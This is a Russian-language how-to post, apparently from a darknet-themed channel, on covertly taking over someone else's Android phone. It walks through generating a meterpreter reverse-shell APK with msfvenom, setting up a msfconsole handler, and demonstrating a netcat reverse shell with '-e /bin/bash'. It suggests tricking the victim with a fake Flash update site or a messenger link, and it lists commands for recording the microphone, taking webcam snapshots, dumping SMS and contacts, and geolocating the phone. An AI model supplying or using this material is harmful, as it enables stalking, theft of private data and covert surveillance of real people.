Как получить доступ к чужому телефону на Android?
@darknetworldЧасть материала будет предоставлена в форме мануала с пошаговыми действиями, а часть – для философских раздумий и интерпретаций. Все зависит от ваших целей, знаний и подкованности жертвы. Если у вас нет доступа к конкретному смартфону, то нужно будет пофантазировать с социальной инженерией😉
Принцип работы
Простыми словами, сначала мы создадим приложение (payload), потом определенным образом доставим его жертве, а в конце у нас будет сессия meterpreter.
Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.
Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:
nc -l -p 8577
Жертва в свою очередь подключается к этому открытому порту:
nc 192.168.1.1 8577 -e /bin/bash
Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.
Вот по такому принципу мы и будем работать.
Создание payload
Открываем терминал и с помощью нижеприведенного набора создаем приложение с расширением ".apk", которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:
msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shelll.apk
После выполнения команды в корневой директории будет создан файл shelll.apk:
Далее необходимо запустить msfconsole.
msfconsole
После этого последовательно выполняем все команды:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ВашIP
set LPORT 4444
exploit
После этого жертва должна скачать и запустить наше приложение. Как это сделать – это уже философский вопрос. Можно отправить ссылку в мессенджер. Можно, как вариант, сделать сайт с заглушкой под обновление Flash-плеера. Таким образом, пользователь зайдет и начнет скачивать обновление.
После этого будет установлена сессия удаленного управления.
Полезные команды:
record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate
Базовых знаний английского будет достаточно, чтобы понять, для чего эти команды. Не будем расписывать...
После установки сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.